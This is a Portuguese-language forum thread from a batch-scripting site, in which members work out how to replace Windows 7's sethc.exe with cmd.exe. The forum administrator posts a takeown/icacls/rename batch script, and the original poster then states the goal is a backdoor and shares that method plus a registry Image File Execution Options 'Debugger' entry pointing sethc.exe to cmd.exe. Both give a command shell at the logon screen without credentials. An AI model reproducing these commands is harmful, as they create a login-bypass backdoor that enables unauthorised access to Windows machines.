Batch-Satti
Se você ainda não é um membro cadastre-se!

Existem centenas de scripts para quem é membro.

As categorias para os membros cadastrados são:

BATCH-SCRIPTS COMPLETO.
(Espaço onde são postados os scripts que tenham funcionalidade completa)
BADCONS VIRUS E TROJANS .
(Espaço onde são postados scripts e técnicas em vírus trojans e worm baseados em scripts )
SOMENTE PARA MEMBROS.
(Espaço destinado aos membros discutirem ou tirarem duvidas)
TUTORIAIS E EXPLICAÇÕES.
(Aqui são colocadas as explicações de comandos e técnicas para confecção de scripts )

EXISTEM MUITAS OUTRAS CATEGORIAS MÁS ESSAS SÃO AS PRINCIPAIS !

ENTRE E PARTICIPE !!!!!!!
MENSAGENS AOS MEMBROS :
TIVEMOS QUE AUTORIZAR PROPAGANDAS NO FORUM E TALVEZ O FIREFOX E OUTROS NAVEGADORES NÃO FUNCIONEM
UTILIZEM O INTERNET EXPLORER OU ATUALIZEM PARA O FIREFOX 4.0 BETA

ASS. BOSS-HEAD


Pesquisa personalizada

Renover Sethc.exe

Ver o tópico anterior Ver o tópico seguinte Ir em baixo

Renover Sethc.exe

Mensagem por ilunne em Qui Mar 07, 2013 11:03 am

Colegas,
Preciso Renomear o arquivo Sethc.exe na pasta System32 do windows7 em um BAT.
Mesmo executando o cmd como administrador, para testar, da erro de acesso negado ao renomear ou mesmo deletar este arquivo.

Eu preciso fazer isso para automatizar uma rotina de manutenção que eu faço.
Alguém tem alguma idéia de como proceder?

Outra dúvida que eu tenho é quanto ao significado do comando "pushd %~dp0", que retorna ao diretório onde o arquivo foi executado. Por quê %~dp0?

Mad

ilunne

Idade : 30

Voltar ao Topo Ir em baixo

Re: Renover Sethc.exe

Mensagem por Boss-Head em Qui Mar 07, 2013 7:44 pm

[Você precisa estar registrado e conectado para ver este link.]

sua duvida pode ser sanada aqui Question

quanto ao Sethc.exe




@echo off
takeown /f %systemroot%\system32\sethc.exe
icacls %systemroot%\system32\sethc.exe /grant administrador:f
rename %systemroot%\system32\sethc.exe sethc.exe.bak
copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe
rename %systemroot%\system32\cmd3.exe sethc.exe

tenta se não der vamos tentando....
avatar
Boss-Head

Idade : 32

Voltar ao Topo Ir em baixo

Re: Renover Sethc.exe

Mensagem por ilunne em Ter Mar 26, 2013 1:40 pm

Boss-Head escreveu:[Você precisa estar registrado e conectado para ver este link.]

sua duvida pode ser sanada aqui Question

quanto ao Sethc.exe




@echo off
takeown /f %systemroot%\system32\sethc.exe
icacls %systemroot%\system32\sethc.exe /grant administrador:f
rename %systemroot%\system32\sethc.exe sethc.exe.bak
copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe
rename %systemroot%\system32\cmd3.exe sethc.exe

tenta se não der vamos tentando....

a partir da linha rename da acesso negado,
eu tentei executar linha a linha no cmd em modo administrativo mas não deu...
que fazer?

ilunne

Idade : 30

Voltar ao Topo Ir em baixo

BackDoor Win7

Mensagem por ilunne em Sex Abr 12, 2013 11:09 pm

A ajuda fornecida não teve resultado.
Entretanto, estendendo minha pesquisa, achei duas soluções, uma semelhando ao que pretendia fazer, e outra muito mais interessante e rápida, via registro do ruindows.

A intenção é criar um backdoor no meu computador, de forma semi-automática durante o processo de formatação.

Compartilho aqui os dois procedimentos:


+--------------------------------------+
Forma como eu esperava fazer
+--------------------------------------+

Basta substituir o arquivo (quase inútil) sethc.exe e copiar o cmd.exe com o nome sethc.exe. O sethc é responsável por mostrar aquela janela de advertência quando se pressiona shift 5 vezes, esta janela pode ser invocada na tela de logon.

Só que no windows 7 o proprietário deste arquivo está "acima" do grupo administradores, então é necessário primeiro tornar-se proprietário dele:

Código:
takeown /f "c:\windows\system32\Sethc.exe"
icacls "c:\windows\system32\Sethc.exe" /grant administradores:F

Depois é só seguir com o resto do script.

===================================
Forma mais eficiente
===================================

Não precisa apagar nem substituir arquivo, basta mexer no registro, via script mesmo:

Código:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"


ilunne

Idade : 30

Voltar ao Topo Ir em baixo

Re: Renover Sethc.exe

Mensagem por Conteúdo patrocinado


Conteúdo patrocinado


Voltar ao Topo Ir em baixo

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo


 
Permissão deste fórum:
Você não pode responder aos tópicos neste fórum